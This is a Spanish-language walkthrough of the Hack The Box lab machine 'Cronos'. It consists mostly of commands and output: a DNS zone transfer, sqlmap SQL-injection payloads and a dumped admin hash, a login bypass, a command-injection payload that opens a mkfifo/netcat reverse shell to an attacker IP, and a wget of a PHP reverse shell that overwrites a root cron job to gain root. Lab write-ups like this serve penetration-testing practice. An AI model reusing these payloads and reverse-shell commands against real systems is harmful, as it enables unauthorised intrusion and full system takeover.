Esta maquina estuvo interesante porque tenias que hacer muchas cosas chiquitas para lograr tu objetivo. Entre ellas agregar el host, y hackear DNS por que las herramientas normales no funcionaban.
Empezamos con un NMAP
root@Kali2:~# nmap -sC -sV 10.10.10.13 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 21:57 CET Nmap scan report for 10.10.10.13 Host is up (0.034s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Hacemos un nslookup
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds root@Kali2:~# nslookup > server 10.10.10.13 Default server: 10.10.10.13 Address: 10.10.10.13#53 > 10.10.10.13 13.10.10.10.in-addr.arpa name = ns1.cronos.htb. > cronos.htb Server: 10.10.10.13 Address: 10.10.10.13#53 Name: cronos.htb Address: 10.10.10.13
Despues podemos pedir una zone transfer de los DNS y descubrimos admin.cronos.htb (domained no servia en este caso)
; <<>> DiG 9.11.5-P4-1-Debian <<>> axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 24 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) ;; WHEN: Tue Oct 29 22:04:30 CET 2019 ;; XFR size: 7 records (messages 1, bytes 203)
Al descubrir los host hay que agregarlos al host file en linux, se debe ver algo así
127.0.0.1 localhost 127.0.1.1 kali 10.10.10.13 cronos.htb admin.cronos.htb
Con eso ya fucionan las paginas web.
Podemos hacer un SQLmap muy agresivo y vemos que es vulnerable a sql injection. Extraje el password hash pero no pude crackearlo. Lo que hice en vez fue admin’– – para hacer bypass y lograr accesso.
root@Kali2:~/Desktop# sqlmap --keep-alive --threads=10 --risk=3 --level=5 -r cronos ___ __H__ ___ ___["]_____ ___ ___ {1.3.3#stable} |_ -| . [,] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [22:13:24] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 612 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: username=-8951' OR 5579=5579-- gqXx&password=a Type: AND/OR time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind (comment) Payload: username=a' RLIKE SLEEP(5)#&password=a Database: admin Table: users [1 entry] +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | admin | 4f5fffa7b2340178a716e3832451e058 | +----+----------+----------------------------------+
Una vez adentro podemos hacer post requests:
POST /welcome.php HTTP/1.1 Host: admin.cronos.htb ... Cookie: PHPSESSID=0lf9ah4h4f2ogilon01ad15va5 Upgrade-Insecure-Requests: 1 command=traceroute&host=8.8.8.8
Si modificamos el command a
command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1235+>/tmp/f
Tenemos una shell
Es importante export Term=xxx para que quede bien la shell y no se porque empezar con un clear *ni idea
LinEnum nos muestra
# m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
www-data@cronos:/dev/shm$ ls -la /var/www/laravel/artisan -rwxr-xr-x 1 www-data www-data 5492 Oct 30 00:27 /var/www/laravel/artisan
Artisan es modificable asi que le podemos injectar una reverse tcp shell
www-data@cronos:/dev/shm$ wget 10.10.14.4:801/php-reverse-shell.php --2019-10-30 00:26:47-- http://10.10.14.4:801/php-reverse-shell.php Connecting to 10.10.14.4:801... connected. HTTP request sent, awaiting response... 200 OK Length: 5492 (5.4K) [application/octet-stream] Saving to: 'php-reverse-shell.php' php-reverse-shell.p 100%[===================>] 5.36K --.-KB/s in 0.1s 2019-10-30 00:26:47 (42.0 KB/s) - 'php-reverse-shell.php' saved [5492/5492] www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/a app/ artisan www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/a app/ artisan www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/artisan
A partir de ahí ya la tenemos
root@Kali2:~/Desktop# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.4] from (UNKNOWN) [10.10.10.13] 39512 Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 00:28:01 up 8 min, 0 users, load average: 0.00, 0.10, 0.09 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can't access tty; job control turned off # whoami root
Con eso agregamos una maquina más a nuestra cuenta 🙂